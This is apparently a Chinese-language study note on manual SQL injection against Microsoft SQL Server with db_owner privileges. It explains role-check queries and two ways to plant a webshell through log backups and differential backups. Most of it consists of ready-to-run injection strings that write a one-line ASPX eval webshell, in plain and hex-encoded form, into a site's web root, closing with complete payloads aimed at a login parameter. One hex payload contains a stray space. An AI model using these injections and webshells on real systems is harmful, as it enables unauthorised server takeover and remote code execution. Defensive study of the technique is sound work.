学习笔记二十三：Mssql手注之db_owner权限处理

MSSQL全称： Microsoft SQL Server

3个权限： sysadmin \ db_owner \ public

权限判断

and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员

and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限

and 1=(Select IS_MEMBER('public'))

Getshell前提

db_owner权限

网站物理路径，也叫网站绝对路径，可以通过让网站报错来获取

Getshell姿势

Log备份Getshell

;alter database test set RECOVERY FULL--     //更改数据库的恢复模式为完整模式，test是数据库名

;create table cmd (a image)--   ///创建cmd表，a是字段名，image是字段类型

;backup log test to disk = 'c:/1.bak' with init--    //进行备份

;insert into cmd (a) values ('<%@ Page Language="Jscript"%> %eval(Request.Item["hackdog"],"unsafe");%>')--   //插入一句话木马

;backup log test to disk = 'C:/Users/Administrator/Desktop/wwwroot/xf.aspx'--  //将日志备份放进网站，之后就可以通过网站观察是否成功获取webshell

;drop table cmd--  //删除cmd表，也许数据库内已有这张表，那么我们在创建之前要先把它删除

差异备份Getshell

1.首先完整备份一次（c:\ddd.bak为所备份未见）

backup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插入数据

create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd)

values(0x3c25402050616765204c616e67756167653d224a73637269707422253e20256576616c28526571756573742e4974656d5b226861636b646f67225d2c22756e7361666522293b253e);--

3.进行差异备份

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

其中上面那段16进制码其实就是这个一句话木马的内容：<%@ Page Language="Jscript"%> <%eval(Request.Item["hackdog"],"unsafe");%>

admin2' aNd 1=1 aNd '1'='1

c:\Users\Administrator\desktop\l\default.aspx.cs:503

admin2';alter database test set RECOVERY FULL--

admin2';drop table cmd;--

admin2';create table cmd (a image);backup log test to disk = 'c:/x.bak' with init;insert into cmd (a) values (0x3c25402050616765204c616e67756167653d224a73637269707422253e20256576616c28526571756573742e4974656d5b226861636b646f67225d2c22756e7361666522293b253e)--

admin2';backup log test to disk = 'c:\Users\Administrator\desktop\l\darkxx.aspx'--

admin2';backup database test to disk = 'c:\x.bak';create table [dbo].[cmd] ([colu] [image]);insert into cmd(colu)values(0x3c25402050616765204c616e67756167653d224a73637269707422253e20256576616c285265717 56573742e4974656d5b226861636b646f67225d2c22756e7361666522293b253e);--

admin2';backup database test to disk='c:\Users\Administrator\desktop\l\d2.aspx' WITH DIFFERENTIAL,FORMAT;--

admin2';drop table dtest--